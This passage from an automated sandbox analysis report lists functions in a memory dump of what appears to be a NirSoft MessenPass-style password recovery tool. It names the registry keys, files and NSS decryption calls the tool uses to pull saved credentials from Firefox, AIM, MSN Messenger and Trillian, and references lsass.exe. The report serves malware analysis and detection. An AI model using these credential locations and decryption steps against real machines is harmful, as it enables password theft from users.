                                                                                                    • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                                                                                    • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                                                                                    • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                                                                                    • API String ID: 1343656639-3807849023
                                                                                                    • Opcode ID: e5bc66620193fcb5e979feaec0f41da071ad9e7003931167bd5cc747ee915b4d
                                                                                                    • Instruction ID: a91a0d65cf69bd7356af7bc7a6c17349b00265a6148a6ee8044f27827290c0ec
                                                                                                    • Opcode Fuzzy Hash: e5bc66620193fcb5e979feaec0f41da071ad9e7003931167bd5cc747ee915b4d
                                                                                                    • Instruction Fuzzy Hash: 1A61907190020AEBDF20AF61DD89ADE3BB8BF84305F10817BF915A61A0DB389945DF5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405EC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00405EE7
                                                                                                    • memset.MSVCRT ref: 00405EFF
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 00405F3A
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • _mbsnbicmp.MSVCRT ref: 00405F68
                                                                                                    • memset.MSVCRT ref: 00405F87
                                                                                                    • memset.MSVCRT ref: 00405FA0
                                                                                                    • _snprintf.MSVCRT ref: 00405FB9
                                                                                                    • _mbsrchr.MSVCRT ref: 00405FDE
                                                                                                    • _mbsicmp.MSVCRT ref: 00406012
                                                                                                    • _mbscpy.MSVCRT ref: 0040602B
                                                                                                    • _mbscpy.MSVCRT ref: 0040603E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                    • _mbscpy.MSVCRT ref: 0040607A
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                    • API String ID: 201549630-2797892316
                                                                                                    • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                                                                                    • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                                                                                    • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                                                                                    • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410C4C, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00410C6D
                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                      • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                      • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
                                                                                                      • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                      • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                                                                                    • memset.MSVCRT ref: 00410CB4
                                                                                                    • strlen.MSVCRT ref: 00410CBE
                                                                                                    • strlen.MSVCRT ref: 00410CCC
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                    • API String ID: 2719586705-3659000792
                                                                                                    • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                    • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                    • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                    • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004110AF, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041113F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                                                                                    • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
                                                                                                    • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                                                                                    • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004064FB, Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                      • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                      • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                      • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                    • memset.MSVCRT ref: 00406537
                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                                                                                    • memset.MSVCRT ref: 0040657E
                                                                                                    • memset.MSVCRT ref: 00406596
                                                                                                    • memset.MSVCRT ref: 004065AE
                                                                                                    • strlen.MSVCRT ref: 004065B9
                                                                                                    • strlen.MSVCRT ref: 004065C7
                                                                                                    • strlen.MSVCRT ref: 004065F2
                                                                                                    • strlen.MSVCRT ref: 00406600
                                                                                                    • strlen.MSVCRT ref: 0040662B
                                                                                                    • strlen.MSVCRT ref: 00406639
                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                      • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                      • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                      • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                      • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                                                                                      • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                    • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                    • API String ID: 4081699353-561706229
                                                                                                    • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                    • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                    • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                    • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D3A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D3C8
                                                                                                      • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                    • _mbscpy.MSVCRT ref: 0040D41B
                                                                                                    • _mbscpy.MSVCRT ref: 0040D464
                                                                                                    • memset.MSVCRT ref: 0040D47C
                                                                                                    • strlen.MSVCRT ref: 0040D49D
                                                                                                    • strlen.MSVCRT ref: 0040D4AB
                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                                                                                      • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                                                                                    • API String ID: 2174551368-3003071570
                                                                                                    • Opcode ID: 3b09688e58a0060df126f88804a7f93ee873953dd817c9188fb91b88a1e58734
                                                                                                    • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                                                                                    • Opcode Fuzzy Hash: 3b09688e58a0060df126f88804a7f93ee873953dd817c9188fb91b88a1e58734
                                                                                                    • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413E10, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662548030-0
                                                                                                    • Opcode ID: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
                                                                                                    • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                                                                                    • Opcode Fuzzy Hash: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
                                                                                                    • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DA79, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                                                                                      • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                                                                                    Strings
                                                                                                    • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                                                                                    • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                                                                                    • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                                                                                    • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                                                                                    • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Open$ByteCharMultiWidememset$FreeLocal
                                                                                                    • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                                                                                    • API String ID: 3472595403-3472580514
                                                                                                    • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                    • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                                                                                    • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                    • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040BBF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                    • String ID: .cfg$General$WinPos
                                                                                                    • API String ID: 1012775001-3165880290
                                                                                                    • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                    • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                                                                                    • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                    • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040260A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                                                                                    • memset.MSVCRT ref: 0040265A
                                                                                                    • memset.MSVCRT ref: 00402676
                                                                                                    • wcscpy.MSVCRT ref: 004026BD
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402724
                                                                                                    Strings
                                                                                                    • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$CloseEnumOpenValuewcscpy
                                                                                                    • String ID: Software\America Online\AIM6\Passwords
                                                                                                    • API String ID: 295685061-818317896
                                                                                                    • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                    • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                                                                                    • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                    • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004039A8, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpimemsetsprintf
                                                                                                    • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                                                                                    • API String ID: 1148023869-3238971583
                                                                                                    • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                    • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                                                                                    • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                    • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FA34, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                                                                                      • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                                                                                      • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                                                                                      • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                                                                                    • memset.MSVCRT ref: 0040FA77
                                                                                                    • strlen.MSVCRT ref: 0040FA8E
                                                                                                    • strlen.MSVCRT ref: 0040FA97
                                                                                                    • strlen.MSVCRT ref: 0040FAF0
                                                                                                    • strlen.MSVCRT ref: 0040FAFE
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscatmemset$_mbscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 29466866-467022611
                                                                                                    • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                                                                                    • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                                                                                    • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                                                                                    • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004043E4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: DirectorySystem_mbscpymemcpymemset
                                                                                                    • String ID: hA$lsass.exe
                                                                                                    • API String ID: 3651535325-1783533361
                                                                                                    • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                                                                                    • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
                                                                                                    • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                                                                                    • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FC4F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FC6B
                                                                                                    • memset.MSVCRT ref: 0040FC82
                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                    • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                      • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                      • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                      • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
                                                                                                    • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 3071782539-1174173950
                                                                                                    • Opcode ID: 0ace9a77bbb466f88f422f42c3b9961c7499075adbab629369391e65b203af89
                                                                                                    • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                    • Opcode Fuzzy Hash: 0ace9a77bbb466f88f422f42c3b9961c7499075adbab629369391e65b203af89
                                                                                                    • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004085B9, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                                                                                      • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                                                                                    • _wcslwr.MSVCRT ref: 0040866E
                                                                                                    • wcslen.MSVCRT ref: 0040868B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
                                                                                                    • String ID: /$/
                                                                                                    • API String ID: 2365529402-2523464752
                                                                                                    • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                    • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                                                                                    • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                    • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407F7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
